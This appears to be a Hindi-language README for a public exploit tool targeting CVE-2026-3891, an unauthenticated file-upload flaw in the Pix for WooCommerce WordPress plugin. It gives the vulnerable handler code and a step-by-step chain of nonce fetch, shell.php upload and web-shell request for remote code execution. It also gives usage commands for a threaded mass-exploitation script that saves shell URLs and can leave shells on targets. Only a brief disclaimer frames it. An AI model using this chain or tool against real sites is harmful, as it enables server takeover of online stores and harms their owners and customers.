
Pix for WooCommerce में certificate_crt_path पैरामीटर के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड | CVSS 9.8
CVE-2026-3891 एक गंभीर-स्तर (CVSS 9.8) अप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता है Pix for WooCommerce WordPress प्लगइन (linknacional द्वारा) संस्करणों में ≤ 1.5.0।
lkn_pix_for_woocommerce_c6_save_settings AJAX हैंडलर में:
certificate_crt_path पैरामीटर के माध्यम से कोई भी फ़ाइल एक्सटेंशन स्वीकार किया जाता हैlkn_pix_for_woocommerce_generate_nonce endpoint के माध्यम सेअपलोड की गई फ़ाइलें वेब-सुलभ निर्देशिका /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/ में रखी जाती हैं।
| संस्करण | स्थिति |
|---|---|
| ≤ 1.5.0 | असुरक्षित |
| 1.6.0+ | पैच किया गया |
खोजकर्ता: Wordfence के माध्यम से Alexis Lafontaine (13 मार्च, 2026)
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);
// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
// No current_user_can() check
// No wp_check_filetype() call
move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
→ वैध nonce प्राप्त करें (कोई प्रमाणीकरण आवश्यक नहीं)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
→ certificate_crt_path फ़ील्ड के माध्यम से shell.php अपलोड करें
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
→ RCE
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup
-t, --target एकल लक्ष्य
-f, --file लक्ष्य सूची
-o, --output RCE URL सहेजें
--threads कार्यकर्ता (डिफ़ॉल्ट: 30)
--no-cleanup लक्ष्य पर शेल छोड़ें
--debug प्रत्येक अनुरोध दिखाएँ
-v, --verbose विस्तृत आउटपुट
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।
| संसाधन | लिंक |
|---|---|
| Wordfence सलाह | wordfence.com |
| NVD प्रविष्टि | CVE-2026-3891 |
| शोधकर्ता | Alexis Lafontaine |
linknacional या Pix for WooCommerce से संबद्ध नहीं है।